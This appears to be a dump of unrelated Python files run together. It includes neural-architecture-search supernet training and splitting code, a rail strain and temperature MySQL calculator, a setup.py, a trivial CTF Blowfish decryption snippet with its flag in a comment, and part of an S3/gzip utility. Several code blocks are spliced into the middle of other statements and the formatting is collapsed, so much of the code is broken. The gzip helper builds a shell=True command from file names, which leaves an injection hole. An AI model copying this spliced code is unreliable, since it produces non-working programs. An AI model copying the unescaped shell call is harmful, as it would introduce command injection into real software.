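# format string:
epoch, nBatch, i, subnet_idx = 1, 500, 3, 2
subnet_seed = int('%d%.3d%.3d' % (epoch * nBatch + i, subnet_idx, 0))
print(subnet_seed)    # 503002000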
distributed.get_world_size() loss.backward() distributed.sync_grad_sum(run_manager.net) run_manager.optimizer.step() losses.update(list_mean(loss_of_subnets), images.size(0)) top1.update(list_mean(acc1_of_subnets), images.size(0)) top5.update(list_mean(acc5_of_subnets), images.size(0)) if i % 100 == 0 and torch.distributed.get_rank() == 0: string = f"Train Epoch [{epoch}] Iter [{i}/{nBatch}] " for key, value in { 'task': args.task, 'phase': args.phase, 'loss': "{:.3f}".format(losses.avg.item()), 'top1': "{:.3f}".format(top1.avg.item()), 'top5': "{:.3f}".format(top5.avg.item()), 'R': images.size(2), 'lr': "{:.3f}".format(new_lr), 'loss_type': loss_type, 'seed': str(subnet_seed), 'str': subnet_str, 'data_time': "{:.3f}".format(data_time.avg), }.items(): string += f"{key}: {value}, " print(string) # if i >= 100: # break # args.logging.info(string) # t.set_postfix({ # 'task':args.task, # 'phase':args.phase, # 'loss': losses.avg.item(), # 'top1': top1.avg.item(), # 'top5': top5.avg.item(), # 'R': images.size(2), # 'lr': new_lr, # 'loss_type': loss_type, # 'seed': str(subnet_seed), # 'str': subnet_str, # 'data_time': data_time.avg, # }) # t.update(1) end = time.time() return losses.avg.item(), top1.avg.item(), top5.avg.item() def validate_supernet(run_manager, epoch=0, is_test=True, image_size_list=None, width_mult_list=None, ks_list=None, expand_ratio_list=None, depth_list=None, additional_setting=None): dynamic_net = run_manager.net if isinstance(dynamic_net, nn.DataParallel): dynamic_net = dynamic_net.module dynamic_net.eval() if image_size_list is None: image_size_list = int2list(run_manager.run_config.data_provider.image_size, 1) if width_mult_list is None: width_mult_list = [i for i in range(len(dynamic_net.width_mult_list))] if ks_list is None: ks_list = dynamic_net.ks_list if expand_ratio_list is None: expand_ratio_list = dynamic_net.expand_ratio_list if depth_list is None: depth_list = dynamic_net.depth_list subnet_settings = [] for w in width_mult_list: for d in depth_list: for e in expand_ratio_list: for k in ks_list: for img_size in image_size_list: subnet_settings.append([{ 'image_size': img_size, 'wid': w, 'd': d, 'e': e, 'ks': k, }, 'R%s-W%s-D%s-E%s-K%s' % (img_size, w, d, e, k)]) # for w in width_mult_list: # for d in depth_list: # for e in expand_ratio_list: # for k in ks_list: # for img_size in image_size_list: # subnet_settings.append([{ # 'image_size': img_size, # 'wid': w, # 'd': d, # 'e': e, # 'ks': k, # }, 'R%s-W%s-D%s-E%s-K%s' % (img_size, w, d, e, k)]) if additional_setting is not None: subnet_settings += additional_setting losses_of_subnets, top1_of_subnets, top5_of_subnets = [], [], [] valid_log = '' for setting, name in subnet_settings: run_manager.write_log('-' * 30 + ' Validate %s ' % name + '-' * 30, 'train', should_print=True) run_manager.run_config.data_provider.assign_active_img_size(setting.pop('image_size')) # setting.pop('image_size') dynamic_net.set_active_subnet(**setting) run_manager.write_log(dynamic_net.module_str, 'train', should_print=True) run_manager.reset_running_statistics(dynamic_net) loss, top1, top5 = run_manager.validate(epoch=epoch, is_test=is_test, run_str=name, net=dynamic_net) losses_of_subnets.append(loss) top1_of_subnets.append(top1) top5_of_subnets.append(top5) valid_log += '%s (%.3f), ' % (name, top1) return list_mean(losses_of_subnets), list_mean(top1_of_subnets), list_mean(top5_of_subnets), valid_log def match_loss(gw_syn, gw_real, dis_metric='per-filter-cos'): dis = torch.tensor(0.0).cuda() if dis_metric == 'per-filter-cos': for ig 
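# match_loss above delegates the 'per-filter-cos' metric to distance_wb, which is not
# defined in this file. A hedged sketch of what such a per-filter cosine gradient distance
# usually looks like (an assumption, not this project's implementation): flatten each
# output filter and sum 1 - cosine similarity across filters.
import torch


def per_filter_cos_distance(gwr, gws):
    if gwr.dim() > 2:                      # conv weights: (out, in, k, k) -> (out, in*k*k)
        gwr = gwr.reshape(gwr.shape[0], -1)
        gws = gws.reshape(gws.shape[0], -1)
    elif gwr.dim() == 1:                   # bias / BN vectors: treat as a single filter
        gwr = gwr.reshape(1, -1)
        gws = gws.reshape(1, -1)
    cos = torch.sum(gwr * gws, dim=-1) / (
        torch.norm(gwr, dim=-1) * torch.norm(gws, dim=-1) + 1e-6)
    return torch.sum(1 - cos)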
in range(len(gw_real)): gwr = gw_real[ig] gws = gw_syn[ig] dis += distance_wb(gwr, gws) elif dis_metric == 'mse': gw_real_vec = [] gw_syn_vec = [] for ig in range(len(gw_real)): gw_real_vec.append(gw_real[ig].reshape((-1))) gw_syn_vec.append(gw_syn[ig].reshape((-1))) gw_real_vec = torch.cat(gw_real_vec, dim=0) gw_syn_vec = torch.cat(gw_syn_vec, dim=0) dis = torch.sum((gw_syn_vec - gw_real_vec) ** 2) elif dis_metric == 'cos': gw_real_vec = [] gw_syn_vec = [] for ig in range(len(gw_real)): gw_real_vec.append(gw_real[ig].reshape((-1))) gw_syn_vec.append(gw_syn[ig].reshape((-1))) gw_real_vec = torch.cat(gw_real_vec, dim=0) gw_syn_vec = torch.cat(gw_syn_vec, dim=0) dis = 1 - torch.sum(gw_real_vec * gw_syn_vec, dim=-1) / ( torch.norm(gw_real_vec, dim=-1) * torch.norm(gw_syn_vec, dim=-1) + 0.000001) else: exit('DC error: unknown distance function') return dis def mincut_split_ofa(dist_avg, split_num): # note: this is not strictly mincut, but it's fine for this assert ( split_num == 2 or split_num == 3), 'always split into 2 or 3 groups for darts space (when using gradient to split)' assert isinstance(dist_avg, np.ndarray) vertex = [i for i in range(dist_avg.shape[0])] max_cut = 100000 if split_num == 2: for subset in chain(*map(lambda x: combinations(vertex, x), range(1, len(vertex) + 1))): if len(subset) >= 1 and len(subset) <= len(vertex) // 2: cut = 0 for edge in combinations(vertex, 2): if (edge[0] in subset and edge[1] in subset): cut += dist_avg[edge[0], edge[1]] if (edge[0] not in subset and edge[1] not in subset): cut += dist_avg[edge[0], edge[1]] if cut < max_cut: group0 = np.array([i for i in vertex if i in subset]) group1 = np.array([i for i in vertex if i not in subset]) # max_cut = cut max_cut = (dist_avg - np.tril(dist_avg)).sum() - cut best_groups = [group0, group1] elif split_num == 3: group1 = np.array([0]) group2 = np.array([1]) group3 = np.array([2]) max_cut = (dist_avg - np.tril(dist_avg)).sum() best_groups = [group1, group2, group3] return best_groups, max_cut def random_split_ofa(split_num, num_ops): # when split_num == num_ops -> split every operation like few-shot NAS assert num_ops % split_num == 0, 'always split into even groups for 201' if split_num == num_ops: # exhaustive split opids = np.arange(0, num_ops) else: opids = np.random.permutation(num_ops) group_size = num_ops // split_num groups = [opids[s:s + group_size] for s in np.arange(0, num_ops, group_size)] return groups # split a supernet into subnets, return encodings of splitted supernet def split_supernet(run_manager, args, split_eid, split_crit, split_num, dis_metric='cos'): # switch to train mode run_manager.net.train() if split_crit == 'grad': if split_eid is None: eids = [] # for i in range(1, 3): for i in range(1, len(run_manager.net.blocks)): if run_manager.net.blocks[i].mobile_inverted_conv.kernel_size_enc.sum(dim=-1) == run_manager.net.blocks[ i].mobile_inverted_conv.kernel_size_enc.size(0): eids.append(i) else: eids = [split_eid] best_edge_score, best_eid, best_groups = 0, 9999, None for eid in eids: repeat = 100 dist_avg = 0 # print(eid, run_manager.net.blocks[eid].mobile_inverted_conv.kernel_size_enc) n_choices = run_manager.net.blocks[eid].mobile_inverted_conv.kernel_size_enc.size(0) for _ in range(repeat): encs = [None] ## fetch data (one batch for now) images, labels = next(iter(run_manager.run_config.train_loader)) images, labels = images.cuda(), labels.cuda() target = labels # soft target if args.kd_ratio > 0: args.teacher_model.train() with torch.no_grad(): soft_logits = 
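# A toy check of the brute-force two-group split that mincut_split_ofa performs: enumerate
# subsets of the choices and score each split by the summed distance between pairs that
# stay on the same side. With only 3-5 kernel-size choices the enumeration is tiny, which
# is why the exhaustive search above is acceptable.
import numpy as np
from itertools import chain, combinations

dist = np.array([[0.0, 0.1, 0.9],
                 [0.1, 0.0, 0.8],
                 [0.9, 0.8, 0.0]])        # small distance = similar gradients
vertex = list(range(dist.shape[0]))
best = None
for subset in chain(*(combinations(vertex, r) for r in range(1, len(vertex) // 2 + 1))):
    same_side = sum(dist[a, b] for a, b in combinations(vertex, 2)
                    if (a in subset) == (b in subset))
    if best is None or same_side < best[0]:
        best = (same_side, [sorted(subset), [v for v in vertex if v not in subset]])
print(best)    # choices 0 and 1 (similar gradients) stay together, choice 2 is split off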
args.teacher_model(images).detach() soft_label = F.softmax(soft_logits, dim=1) # clear gradients run_manager.optimizer.zero_grad() subnet_settings = run_manager.net.sample_active_subnet() split_op_grads = [] for opid in range(n_choices): run_manager.net.blocks[eid].mobile_inverted_conv.active_kernel_size = \ run_manager.net.blocks[eid].mobile_inverted_conv.kernel_size_list[opid] output = run_manager.net(images) if args.kd_ratio == 0: loss = run_manager.train_criterion(output, labels) loss_type = 'ce' else: if args.kd_type == 'ce': kd_loss = cross_entropy_loss_with_soft_target(output, soft_label) else: kd_loss = F.mse_loss(output, soft_logits) loss = args.kd_ratio * kd_loss + run_manager.train_criterion(output, labels) loss = loss * (2 / (args.kd_ratio + 1)) loss = loss / distributed.get_world_size() run_manager.net.zero_grad() loss.backward() distributed.sync_grad_sum(run_manager.net) ## get gradients grads = run_manager.net.get_split_gradients(split_eid=eid) grads = [g.clone().detach() for g in grads] split_op_grads.append(grads) ## compute matching scores (redundant as dist_mat is symmetric, but good for debugging) dist_mat = torch.zeros((n_choices, n_choices)) for opid_i in range(n_choices): for opid_j in range(n_choices): dist_mat[opid_i, opid_j] = match_loss(split_op_grads[opid_i], split_op_grads[opid_j], dis_metric=dis_metric) dist_avg += dist_mat dist_avg /= repeat if run_manager.is_root: print('\n' + 'edge ' + str(eid) + ' distance matrix:') print('\n' + str(dist_avg)) # TODO: write in the Writer ## partition groups, edge_score = mincut_split_ofa(dist_avg.numpy(), split_num) # TODO implement the max-cut algorithm to split the supernet if run_manager.is_root: print('edge ' + str(eid), groups, edge_score) ## compute edge score if edge_score > best_edge_score: best_edge_score = edge_score best_eid = eid best_groups = groups split_eid = best_eid groups = best_groups elif split_crit == 'fewshot': # when num_ops == split_num, reuse random split eid = split_eid n_choices = run_manager.net.blocks[eid].mobile_inverted_conv.kernel_size_enc.size(0) groups = random_split_ofa(split_num, n_choices) else: print(f"ERROR: UNRECOGNIZED SPLIT CRITERIA: {split_crit}"); exit(1) encs_splitted = [] for group in groups: n_choices = run_manager.net.blocks[eid].mobile_inverted_conv.kernel_size_enc.size(0) enc = torch.zeros(n_choices) enc[torch.LongTensor(group)] = 1 encs_splitted.append(enc) return encs_splitted, split_eid def finetune_validate(run_manager, epoch=0, is_test=True, subnet_settings=None, image_size_list=None, width_mult_list=None, ks_list=None, expand_ratio_list=None, depth_list=None, additional_setting=None): dynamic_net = run_manager.net if isinstance(dynamic_net, nn.DataParallel): dynamic_net = dynamic_net.module dynamic_net.eval() if image_size_list is None: image_size_list = int2list(run_manager.run_config.data_provider.image_size, 1) if width_mult_list is None: width_mult_list = [i for i in range(len(dynamic_net.width_mult_list))] if ks_list is None: ks_list = dynamic_net.ks_list if expand_ratio_list is None: expand_ratio_list = dynamic_net.expand_ratio_list if depth_list is None: depth_list = dynamic_net.depth_list # subnet_settings = [] # for w in width_mult_list: # for d in depth_list: # for e in expand_ratio_list: # for k in ks_list: # for img_size in image_size_list: # subnet_settings.append([{ # 'image_size': img_size, # 'wid': w, # 'd': d, # 'e': e, # 'ks': k, # }, 'R%s-W%s-D%s-E%s-K%s' % (img_size, w, d, e, k)]) # if additional_setting is not None: # subnet_settings += 
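# What split_supernet above hands back: one binary mask per group over the kernel-size
# choices of the split block. For n_choices = 3 and groups [[0, 1], [2]], the two
# sub-supernets receive the encodings below.
import torch

n_choices = 3
groups = [[0, 1], [2]]
encs_splitted = []
for group in groups:
    enc = torch.zeros(n_choices)
    enc[torch.LongTensor(group)] = 1
    encs_splitted.append(enc)
print(encs_splitted)    # [tensor([1., 1., 0.]), tensor([0., 0., 1.])]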
additional_setting losses_of_subnets, top1_of_subnets, top5_of_subnets = [], [], [] valid_log = '' run_manager.write_log('-' * 30 + ' Validate ' + '-' * 30, 'train', should_print=True) run_manager.run_config.data_provider.assign_active_img_size(224) # setting.pop('image_size') # dynamic_net.set_active_subnet(**subnet_settings) dynamic_net.set_active_subnet(ks=subnet_settings['ks'], e=subnet_settings['e'], d=subnet_settings['d']) run_manager.write_log(dynamic_net.module_str, 'train', should_print=True) run_manager.reset_running_statistics(dynamic_net) loss, top1, top5 = run_manager.validate(epoch=epoch, is_test=is_test, net=dynamic_net) losses_of_subnets.append(loss) top1_of_subnets.append(top1) top5_of_subnets.append(top5) valid_log += '(%.3f), ' % (top1) # for setting, name in subnet_settings: # print(setting) # run_manager.write_log('-' * 30 + ' Validate %s ' % name + '-' * 30, 'train', should_print=True) # run_manager.run_config.data_provider.assign_active_img_size(setting.pop('image_size')) # # setting.pop('image_size') # dynamic_net.set_active_subnet(**setting) # run_manager.write_log(dynamic_net.module_str, 'train', should_print=True) # # run_manager.reset_running_statistics(dynamic_net) # loss, top1, top5 = run_manager.validate(epoch=epoch, is_test=is_test, run_str=name, net=dynamic_net) # losses_of_subnets.append(loss) # top1_of_subnets.append(top1) # top5_of_subnets.append(top5) # valid_log += '%s (%.3f), ' % (name, top1) return list_mean(losses_of_subnets), list_mean(top1_of_subnets), list_mean(top5_of_subnets), valid_log def finetune_net(run_manager, args, subnet_settings=None, validate_func=None): if validate_func is None: validate_func = finetune_validate for epoch in range(run_manager.start_epoch, run_manager.end_epoch + args.warmup_epochs): train_loss, train_top1, train_top5 = finetune_net_one_epoch( run_manager, args, epoch, args.warmup_epochs, args.warmup_lr, subnet_settings) if (epoch + 1) % args.validation_frequency == 0: # validate under train mode val_loss, val_acc, val_acc5, _val_log = validate_func(run_manager, epoch=epoch, is_test=True, subnet_settings=subnet_settings) # best_acc is_best = val_acc > run_manager.best_acc run_manager.best_acc = max(run_manager.best_acc, val_acc) if run_manager.is_root: val_log = 'Valid [{0}/{1}] loss={2:.3f}, top-1={3:.3f} ({4:.3f})'. 
\ format(epoch + 1 - args.warmup_epochs, run_manager.run_config.n_epochs, val_loss, val_acc, run_manager.best_acc) val_log += ', Train top-1 {top1:.3f}, Train loss {loss:.3f}\t'.format(top1=train_top1, loss=train_loss) val_log += _val_log run_manager.write_log(val_log, 'valid', should_print=False) run_manager.save_model({ 'epoch': epoch, 'best_acc': run_manager.best_acc, 'optimizer': run_manager.optimizer.state_dict(), 'state_dict': run_manager.net.state_dict(), }, is_best=is_best) def finetune_net_one_epoch(run_manager, args, epoch, warmup_epochs=0, warmup_lr=0, subnet_settings=None): dynamic_net = run_manager.net # switch to train mode dynamic_net.train() run_manager.run_config.train_loader.sampler.set_epoch(epoch) MyRandomResizedCrop.EPOCH = epoch nBatch = len(run_manager.run_config.train_loader) data_time = AverageMeter() losses = DistributedMetric('train_loss') top1 = DistributedMetric('train_top1') top5 = DistributedMetric('train_top5') end = time.time() for i, (images, labels) in enumerate(run_manager.run_config.train_loader): data_time.update(time.time() - end) if epoch < warmup_epochs: new_lr = run_manager.run_config.warmup_adjust_learning_rate( run_manager.optimizer, warmup_epochs * nBatch, nBatch, epoch, i, warmup_lr, ) else: new_lr = run_manager.run_config.adjust_learning_rate( run_manager.optimizer, epoch - warmup_epochs, i, nBatch ) images, labels = images.cuda(), labels.cuda() target = labels if isinstance(run_manager.run_config.mixup_alpha, float): # transform data random.seed(int('%d%.3d' % (i, epoch))) lam = random.betavariate(run_manager.run_config.mixup_alpha, run_manager.run_config.mixup_alpha) images = mix_images(images, lam) labels = mix_labels( labels, lam, run_manager.run_config.data_provider.n_classes, run_manager.run_config.label_smoothing ) # soft target if args.kd_ratio > 0: args.teacher_model.train() with torch.no_grad(): soft_logits = args.teacher_model(images).detach() soft_label = F.softmax(soft_logits, dim=1) # clear gradients run_manager.optimizer.zero_grad() loss_of_subnets, acc1_of_subnets, acc5_of_subnets = [], [], [] # compute output subnet_str = '' for _ in range(args.dynamic_batch_size): # set random seed before sampling if args.independent_distributed_sampling: subnet_seed = os.getpid() + time.time() else: subnet_seed = int('%d%.3d%.3d' % (epoch * nBatch + i, _, 0)) random.seed(subnet_seed) # subnet_settings = dynamic_net.sample_active_subnet() dynamic_net.set_active_subnet(ks=subnet_settings['ks'], e=subnet_settings['e'], d=subnet_settings['d']) subnet_str += '%d: ' % _ + ','.join(['%s_%s' % ( key, '%.1f' % subset_mean(val, 0) if isinstance(val, list) else val ) for key, val in subnet_settings.items()]) + ' || ' output = run_manager.net(images) if args.kd_ratio == 0: loss = run_manager.train_criterion(output, labels) loss_type = 'ce' else: if args.kd_type == 'ce': kd_loss = cross_entropy_loss_with_soft_target(output, soft_label) else: kd_loss = F.mse_loss(output, soft_logits) loss = args.kd_ratio * kd_loss + run_manager.train_criterion(output, labels) loss = loss * (2 / (args.kd_ratio + 1)) loss_type = '%.1fkd-%s & ce' % (args.kd_ratio, args.kd_type) # measure accuracy and record loss acc1, acc5 = accuracy(output, target, topk=(1, 5)) loss_of_subnets.append(loss) acc1_of_subnets.append(acc1[0]) acc5_of_subnets.append(acc5[0]) loss = loss / distributed.get_world_size() loss.backward() distributed.sync_grad_sum(run_manager.net) run_manager.optimizer.step() losses.update(list_mean(loss_of_subnets), images.size(0)) 
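# mix_images and mix_labels above come from imagenet_codebase.utils. A hedged sketch of the
# mixup they are assumed to implement (blend every sample with the reversed batch using the
# Beta-sampled lam, and mix label-smoothed one-hot targets the same way); a stand-in, not
# the project's own helpers.
import torch
import torch.nn.functional as F


def mixup_images(images, lam):
    return lam * images + (1 - lam) * torch.flip(images, dims=[0])


def mixup_labels(labels, lam, n_classes, smoothing=0.1):
    onehot = F.one_hot(labels, n_classes).float()
    onehot = onehot * (1 - smoothing) + smoothing / n_classes   # label smoothing
    return lam * onehot + (1 - lam) * torch.flip(onehot, dims=[0])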
top1.update(list_mean(acc1_of_subnets), images.size(0)) top5.update(list_mean(acc5_of_subnets), images.size(0)) if i % 100 == 0 and torch.distributed.get_rank() == 0: string = f"Train Epoch [{epoch}] Iter [{i}/{nBatch}] " for key, value in { 'task': args.task, 'phase': args.phase, 'loss': "{:.3f}".format(losses.avg.item()), 'top1': "{:.3f}".format(top1.avg.item()), 'top5': "{:.3f}".format(top5.avg.item()), 'R': images.size(2), 'lr': "{:.3f}".format(new_lr), 'loss_type': loss_type, 'seed': str(subnet_seed), 'data_time': "{:.3f}".format(data_time.avg), }.items(): string += f"{key}: {value}, " print(string) end = time.time() return losses.avg.item(), top1.avg.item(), top5.avg.item() import _pqkmeans import typing from .encoder_base import EncoderBase class EncoderSample(EncoderBase): def __init__(self): self._impl = _pqkmeans.EncoderSample() def fit_generator(self, x_train): # type: (typing.Iterable[typing.Iterable[float]]) -> None self._impl.fit_generator(x_train) def transform_generator(self, x_test): # type: (typing.Iterable[typing.Iterator[float]]) -> Any for vector in x_test: yield self._impl.transform_one(vector) def inverse_transform_generator(self, x_test): # type: (typing.Iterable[typing.Iterator[int]]) -> Any for vector in x_test: yield self._impl.inverse_transform_one(vector) 0 from setuptools import setup, find_packages setup( name="svm40_exporter", version="0.1.0", description="Prometheus Exporter for Sensirion SVM40 Evaluation Kit", author="", author_email="", url="https://github.com/maveonair/svm40-exporter", packages=find_packages("src"), package_dir={"": "src"}, install_requires=["sensirion-shdlc-svm40>=0.3.0", "prometheus_client>=0.10.1"], scripts=["scripts/svm40-exporter"], ) xrandx/Python-Items0 #!/usr/bin/env python # -*- coding: utf-8 -*- import pymysql import numpy as np import configparser from sqlalchemy.orm import sessionmaker from sqlalchemy.ext.declarative import declarative_base from sqlalchemy import func, distinct from sqlalchemy.dialects.mysql import DOUBLE from sqlalchemy import create_engine, Column, Integer, String from os import path from sys import argv from datetime import datetime, timedelta CURRENT_DIR = path.dirname(path.realpath(argv[0])) + "\\" input_table_mapper = {} config = configparser.ConfigParser() config.read(CURRENT_DIR + "setting.ini", encoding="utf-8") host = config['mysql']['host'].strip() username = config['mysql']['username'].strip() password = config['mysql']['password'].strip() port = config['mysql']['port'].strip() database_name = config['mysql']['database'].strip() import_file_name = config['import_file']['name'].strip() NUM_SCALE = 6 MINI_EPS = 1e-6 mysql_config = 'mysql+pymysql://%s:%s@%s:%s/%s?charset=utf8' % (username, password, host, port, database_name) engine = create_engine(mysql_config, echo=False) # expire_on_commit=False Base = declarative_base() DbSession = sessionmaker(bind=engine) session = DbSession() class InputDataModel: # 输入值:时间、轨温T_r、应变差值ε_d # 输出值:轨温、冻胀高度、锁定轨温、应力 id = Column(Integer, primary_key=True, index=True, autoincrement=True) date = Column(String(32), index=True) time = Column(String(32)) temperature = Column(DOUBLE) strain = Column(DOUBLE) k_packet_num = Column(Integer) k = Column(DOUBLE) b = Column(DOUBLE) k0_packet_num = Column(Integer) k0 = Column(DOUBLE) b0 = Column(DOUBLE) k0_accumulate = Column(DOUBLE) mutation_accumulate = Column(DOUBLE) height = Column(DOUBLE) tsf = Column(DOUBLE) stress = Column(DOUBLE) def fmt(x): if x is None: return 0.0 else: return round(float(x), NUM_SCALE) # 最小二乘法 def 
least_square(former_days_list): x = [fmt(data.temperature) for data in former_days_list] y = [fmt(data.strain) for data in former_days_list] x, y = np.array(x), np.array(y) coefficient = np.polyfit(x, y, 1) return fmt(coefficient[0]), fmt(coefficient[1]) def parse_time(date, time): year_s, mon_s, day_s = date.strip().split('/') h, m, s = time.strip().split(':') return datetime(int(year_s), int(mon_s), int(day_s), int(h), int(m), int(s)) def is_time_less3h(date, time, date2, time2): a = parse_time(date, time) b = parse_time(date2, time2) tmp = a - b return abs(tmp) < timedelta(hours=3) def get_k_packet_num_by_date(days, InputDataClass): query_data = session.query(InputDataClass.date) \ .order_by(InputDataClass.id.desc()) \ .distinct(InputDataClass.date) \ .limit(days) recent_days = [v[0] for v in query_data] recent_data_list = session.query(InputDataClass) \ .filter(InputDataClass.date.in_(recent_days)) \ .all() temp = least_square(recent_data_list) return temp[0], temp[1], len(recent_data_list) def get_k_b_by_packet_num(packet_num, InputDataClass): former_days_list = session.query(InputDataClass) \ .order_by(InputDataClass.id.desc()) \ .limit(packet_num) temp = least_square(former_days_list) return temp[0], temp[1] def get_k_b_k0_b0(InputDataClass, flag_day_num, last_data, src_data): recorded_day_count = session.query(func.count(distinct(InputDataClass.date))).scalar() new_day = False if last_data.date != src_data.date: new_day = True acc_days = recorded_day_count + int(new_day) # d > 16 if acc_days > flag_day_num + 1: k, b = get_k_b_by_packet_num(last_data.k_packet_num, InputDataClass) return last_data.k0_packet_num, last_data.k0, last_data.b0, last_data.k_packet_num, k, b,last_data.k0_accumulate # 3 <= d <= 16 elif 3 <= acc_days <= flag_day_num + 1: # 3 <= d <= 16 new day if new_day: # d = 3, 8, 16 new day if acc_days in [3, 8, 16]: k0 = 0.0 b0 = 0.0 k0_accumulate = 0 k0_packet_num = 0 if acc_days == 3: k0, b0, k0_packet_num = get_k_packet_num_by_date(2, InputDataClass) k0_accumulate = 0 elif acc_days == 8: k0, b0, k0_packet_num = get_k_packet_num_by_date(7, InputDataClass) k0_accumulate = k0 - last_data.k0 elif acc_days == 16: k0, b0, k0_packet_num = get_k_packet_num_by_date(15, InputDataClass) k0_accumulate = k0 - last_data.k0 + last_data.k0_accumulate k_packet_num = k0_packet_num k, b = get_k_b_by_packet_num(k_packet_num, InputDataClass) return k0_packet_num, k0, b0, k_packet_num, k, b, k0_accumulate # d = 4, 5, 6, 7, 9, ... 
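# least_square above is a degree-1 numpy polyfit: it returns the slope k and intercept b of
# strain as a linear function of temperature. Quick check with synthetic data:
import numpy as np

temperature = np.array([10.0, 15.0, 20.0, 25.0])
strain = 2.0 * temperature + 5.0
k, b = np.polyfit(temperature, strain, 1)
print(round(k, 6), round(b, 6))    # 2.0 5.0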
, 16 new day else: k_packet_num = last_data.k_packet_num + 1 k, b = get_k_b_by_packet_num(k_packet_num, InputDataClass) return last_data.k0_packet_num, last_data.k0, last_data.b0, k_packet_num, k, b, last_data.k0_accumulate # 3 < d <= 16 not new day else: if acc_days == 16: k, b = get_k_b_by_packet_num(last_data.k_packet_num, InputDataClass) return last_data.k0_packet_num, last_data.k0, last_data.b0, last_data.k_packet_num, k, b, last_data.k0_accumulate else: k_packet_num = last_data.k_packet_num + 1 k, b = get_k_b_by_packet_num(k_packet_num, InputDataClass) return last_data.k0_packet_num, last_data.k0, last_data.b0, k_packet_num, k, b, last_data.k0_accumulate # d < 3 elif acc_days < 3: return None def parser_form(data): if data is None: return None data.temperature = fmt(data.temperature) data.strain = fmt(data.strain) data.k0 = fmt(data.k0) data.b0 = fmt(data.b0) data.k = fmt(data.k) data.b = fmt(data.b) data.k0_accumulate = fmt(data.k0_accumulate) data.mutation_accumulate = fmt(data.mutation_accumulate) return data def get_param(src_data, InputDataClass): last_data = session.query(InputDataClass) \ .order_by(InputDataClass.id.desc()) \ .first() last_data = parser_form(last_data) if last_data is None: return None tmp = get_k_b_k0_b0(InputDataClass, 15, last_data, src_data) if tmp is None: return None else: k0_packet_num, k0, b0, k_packet_num, k, b, k0_accumulate = tmp mutation = (src_data.strain - last_data.mutation_accumulate - last_data.strain) -\ (k0 * (src_data.temperature - last_data.temperature)) mutation = fmt(mutation) delta_t = abs(src_data.temperature - last_data.temperature) if delta_t < MINI_EPS: deviation = True else: deviation = abs(mutation / delta_t) - 180 > MINI_EPS truth = is_time_less3h(src_data.date, src_data.time, last_data.date, last_data.time) \ and (abs(mutation) - 400 > MINI_EPS) \ and deviation if truth: return k0_packet_num, k0, b0, k_packet_num, k, b, k0_accumulate, last_data.mutation_accumulate + mutation else: return k0_packet_num, k0, b0, k_packet_num, k, b, k0_accumulate, last_data.mutation_accumulate def compute_save(data, InputDataClass): # 更新参数 Mnemonic.param tmp = get_param(data, InputDataClass) # None : < 3 days if tmp is not None: k0_packet_num, k0, b0, k_packet_num, k, b, k0_accumulate, mutation_accumulate = tmp data.height = fmt((-k + k0 - k0_accumulate) * 0.5 + mutation_accumulate * 0.0189) # Tsf = (K - K[0] - ΣΔk0) * 0.075 + (B - B[0]) * 0.015 + 总Δε * 0.08475 data.tsf = fmt((k - k0 - k0_accumulate) * 0.075 + (b - b0) * 0.015 + mutation_accumulate * 0.08475) data.strain -= mutation_accumulate # stress = -11.8 * 0.21 * (temperature - tsf) data.stress = fmt(0.21 * (-11.8) * (data.temperature - data.tsf)) data.k0 = k0 data.b0 = b0 data.k0_packet_num = k0_packet_num data.k0_accumulate = k0_accumulate data.b = b data.k = k data.k_packet_num = k_packet_num data.mutation_accumulate = mutation_accumulate print_str = "%s|%s|%s|%s|%s|%s" % (InputDataClass.__tablename__, data.date, data.time, data.height, data.tsf, data.stress) print(print_str) session.add(data) session.flush() def mapper_generate(table_mapper_dict, Model, device_name, table_prefix): table_name = '%s_%s' % (table_prefix, device_name) if table_name not in table_mapper_dict: table_mapper_dict[table_name] = type( table_name, (Model, Base), {'__tablename__': table_name} ) return table_mapper_dict[table_name] def generate_class(device_name: str): device_name = device_name.lower() input_tmp = mapper_generate(input_table_mapper, InputDataModel, device_name, "ef_statistics") return input_tmp def 
get_data(tmp, InputDataClass): return InputDataClass(date=tmp[1], time=tmp[2], temperature=fmt(tmp[3]), strain=fmt(tmp[4])) def get_data_str(line): tmp = line.strip().split('|') return [x.strip() for x in tmp] def read_from_file(InputDataClass): global import_file_name text_list = [] with open(CURRENT_DIR + import_file_name, 'r', encoding="utf-8") as f: while True: line = f.readline() if not line: break text_list.append(line) data_list = [] try: for line in text_list: str_list = get_data_str(line) data_list.append(get_data(str_list, InputDataClass)) except Exception as e: print(e) print("注意当前也许存在的格式问题") return data_list def deal_by_cmd(): tmp = get_data_str(argv[1]) InputDataClass = generate_class(tmp[0]) Base.metadata.create_all(engine) # 拿到最新参数 data = get_data(tmp, InputDataClass) compute_save(data, InputDataClass) def deal_by_file(): device_name = config['import_file']['device'].strip() InputDataClass = generate_class(device_name) Base.metadata.create_all(engine) import_file_list = read_from_file(InputDataClass) # 拿到最新参数 for i in range(len(import_file_list)): print("====== 文本输入模式 ======") print("从文件 %s 处理设备 %s 的数据" % (import_file_name, device_name)) print("正在处理第 %d 包数据" % (i + 1)) compute_save(import_file_list[i], InputDataClass) def class_init_by_config(): devices = config['mysql']['devices'].strip().split(',') devices = [name.strip() for name in devices] for device_name in devices: generate_class(device_name) def main(): class_init_by_config() if len(argv) != 2: print("参数无效") if argv[1] == "-f": deal_by_file() else: deal_by_cmd() if __name__ == '__main__': main() session.commit() session.close() #!/usr/bin/env python from Crypto.Cipher import Blowfish #flag = 'zjgsuctf{bl0wf15h_bl0ws_y0U_4way~~~}' key = '\x00' * 8 ciphertext = 'iogH/g==' cipher = Blowfish.new(key, Blowfish.MODE_ECB) plaintext = cipher.decrypt(ciphertext.decode('base64')) print plaintext yqsongGitHub/rnaseq-reportrnaseq_report/modules/rnaseq_data_generation_information/__init__.py1-10 from __future__ import absolute_import from .data_generation_information import MultiqcModule0 import os.path import shutil import subprocess import sys import boto3 # noinspection PyPackageRequirements import botocore # noinspection PyPackageRequirements import botocore.exceptions import pypipegzip def copyfileobj(source, destination, buffer_size=1024 * 1024): """ Copy a file from source to destination. source and destination must be file-like objects, i.e. any object with a read or write method, like for example StringIO. """ while True: copy_buffer = source.read(buffer_size) if not copy_buffer: break destination.write(copy_buffer) def gzip_file(file_in: str, file_out: str) -> None: with open(file_in, 'rb') as f_in: f_out = pypipegzip.pypipegzip.zipopen(file_out, 'wb') shutil.copyfileobj(f_in, f_out) f_out.close() def gzip_file_process(file_in: str, file_out: str) -> None: subprocess.check_call( f"gzip < {file_in} > {file_out}", shell=True, ) def object_exists(s3_connection, check_bucket_name: str, object_name: str) -> bool: """ It seems funny we have to write this method but it seems that this is the way to check if an s3 bucket has an object. 
